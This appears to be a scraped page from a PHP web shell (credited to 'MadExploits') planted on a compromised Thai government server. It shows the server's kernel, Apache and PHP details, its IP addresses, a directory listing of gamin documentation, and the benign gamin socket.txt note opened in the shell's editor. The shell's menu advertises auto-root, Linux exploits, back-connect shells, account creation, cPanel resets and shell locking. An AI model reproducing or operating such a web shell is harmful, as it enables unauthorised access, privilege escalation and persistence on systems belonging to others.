Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
gamin-0.1.10 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
153
B
-rw-r--r--
COPYING
24.89
KB
-rw-r--r--
ChangeLog
81.3
KB
-rw-r--r--
Copyright
55
B
-rw-r--r--
FAQ.html
3.87
KB
-rw-r--r--
NEWS
9.48
KB
-rw-r--r--
README
1.48
KB
-rw-r--r--
TODO
2.59
KB
-rw-r--r--
callbacks.gif
4.41
KB
-rw-r--r--
client_server.gif
4.52
KB
-rw-r--r--
config.html
6.72
KB
-rw-r--r--
contacts.html
5.23
KB
-rw-r--r--
debug.html
7.2
KB
-rw-r--r--
debugging.txt
1.26
KB
-rw-r--r--
devel.html
4.85
KB
-rw-r--r--
differences.html
6.61
KB
-rw-r--r--
downloads.html
4.1
KB
-rw-r--r--
gamin.html
31.63
KB
-rw-r--r--
index.html
7.91
KB
-rw-r--r--
internals.html
5.29
KB
-rw-r--r--
news.html
14.12
KB
-rw-r--r--
overview.html
5.2
KB
-rw-r--r--
python.html
6.14
KB
-rw-r--r--
security.html
6.61
KB
-rw-r--r--
server_structs.gif
8.67
KB
-rw-r--r--
socket.txt
1.59
KB
-rw-r--r--
using.html
4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : socket.txt
If there is abstract socket support: ==================================== use them as "\0/tmp/fam-$USER-$GAM_CLIENT_ID" They are not mapped on the filesystem, no attack is possible that way. The client and the server checks on the first '\0' byte received that the other side is of the same UID If there is no abstract socket support: ======================================= Server side: ------------ start: try to create /tmp/fam-$USER using mkdir('/tmp/fam-$USER', 007) if error: make a stat() on it if doesn't exist: return failure to create if user is not getuid() or mode is not 007 or type is not dir: try to unlink() if error: exit with error. if success: goto start: do the socket()/bind() on /tmp/fam-$USER/fam-$GAM_CLIENT_ID Client side: ------------ make a stat on /tmp/fam-$USER if doesn't exist: return failure to create should start the server if user is not getuid() or mode is not 007 or type is not dir: try to unlink() if error: exit with error. if success: return failure should start the server make a stat on /tmp/fam-$USER/fam-$GAM_CLIENT_ID if doesn't exist: return failure to create should start the server if user is not getuid() or type is not socket: try to unlink() if error: exit with error. if success: return failure should start the server do the socket()/connect() on /tmp/fam-$USER/fam-$GAM_CLIENT_ID The client and the server checks on the first '\0' byte received that the other side is of the same UID.
Close